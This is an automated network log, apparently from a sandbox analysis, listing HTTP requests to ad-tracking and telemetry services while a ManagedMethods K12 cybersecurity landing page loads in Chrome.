Source: global trafficHTTP traffic detected: GET /core/lo.js?site-id=759fd941 HTTP/1.1Host: tools.luckyorange.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/a2_dy5o8mn2d6oc_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://get.managedmethods.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixels/a2_dy5o8mn2d6oc/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://get.managedmethods.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1728897184685&id=a2_dy5o8mn2d6oc&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=631133ec-3227-461f-8a3a-bfa5fb517d3d&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_5afed25b&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j/pre/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W/fpconsent.js HTTP/1.1Host: s.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j/pre/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W/index.js HTTP/1.1Host: s.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /consent/check/TSSSGOL6MBFETCAHMJBJCQ?flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&_s=19d08b9214e66ee8e210f5de109a1703&_b=2 HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/283945248938426?v=2.9.170&r=stable&domain=get.managedmethods.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/927141988/?random=1728897184780&cv=11&fst=1728896400000&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfacnBAm9xWD__ZBSWG_a_OM6wwSiWrhojR0gSBRrOHhnmj9Xn&random=3274472283&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /759fd941 HTTP/1.1Host: settings.luckyorange.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-lucky-referrer: https://googleads.g.doubleclick.net/sec-ch-ua-mobile: ?0x-lucky-uid: undefinedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://get.managedmethods.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/927141988/?random=1728897184905&cv=11&fst=1728896400000&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnf-8GT8JX6ML4N2IgODO8ytP8aO-ipd-scLH_tx_K2qXd-R9rL&random=991242014&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j/pre/index.js HTTP/1.1Host: s.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&cookie=&adroll_s_ref=https%3A//googleads.g.doubleclick.net/&keyw=&p0=20119&xa4=1 HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /6834707.js HTTP/1.1Host: js.hs-scripts.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixels/a2_dy5o8mn2d6oc/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/a2_dy5o8mn2d6oc_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1728897184685&id=a2_dy5o8mn2d6oc&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=631133ec-3227-461f-8a3a-bfa5fb517d3d&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_5afed25b&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j/roundtrip.js HTTP/1.1Host: s.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /core/lo.js?site-id=759fd941 HTTP/1.1Host: tools.luckyorange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pxl/iframe_content.html?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: x.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /tr/?id=283945248938426&ev=PageView&dl=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&rl=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&if=false&ts=1728897187290&sw=1280&sh=1024&ud[external_id]=1ad7ee3b723d214336417ad5b634063c&v=2.9.170&r=stable&a=hubspot&ec=0&o=4126&fbp=fb.1.1728897187288.40725635928813979&ler=other&cdl=API_unavailable&it=1728897185090&coo=false&dpo=LDU&dpoco=0&dpost=0&exp=h3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=283945248938426&ev=PageView&dl=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&rl=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&if=false&ts=1728897187290&sw=1280&sh=1024&ud[external_id]=1ad7ee3b723d214336417ad5b634063c&v=2.9.170&r=stable&a=hubspot&ec=0&o=4126&fbp=fb.1.1728897187288.40725635928813979&ler=other&cdl=API_unavailable&it=1728897185090&coo=false&dpo=LDU&dpoco=0&dpost=0&exp=h3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger, not-navigation-sourceReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/927141988/?random=1728897184780&cv=11&fst=1728897184780&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUk0zOnp7KPAX2H7PV04lK3EUODRxZQzvzNUj9mqfajXpAGNwRNeTOLJeNEyKAk
Source: global trafficHTTP traffic detected: GET /759fd941 HTTP/1.1Host: settings.luckyorange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/927141988/?random=1728897184905&cv=11&fst=1728897184905&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUk0zOnp7KPAX2H7PV04lK3EUODRxZQzvzNUj9mqfajXpAGNwRNeTOLJeNEyKAk
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
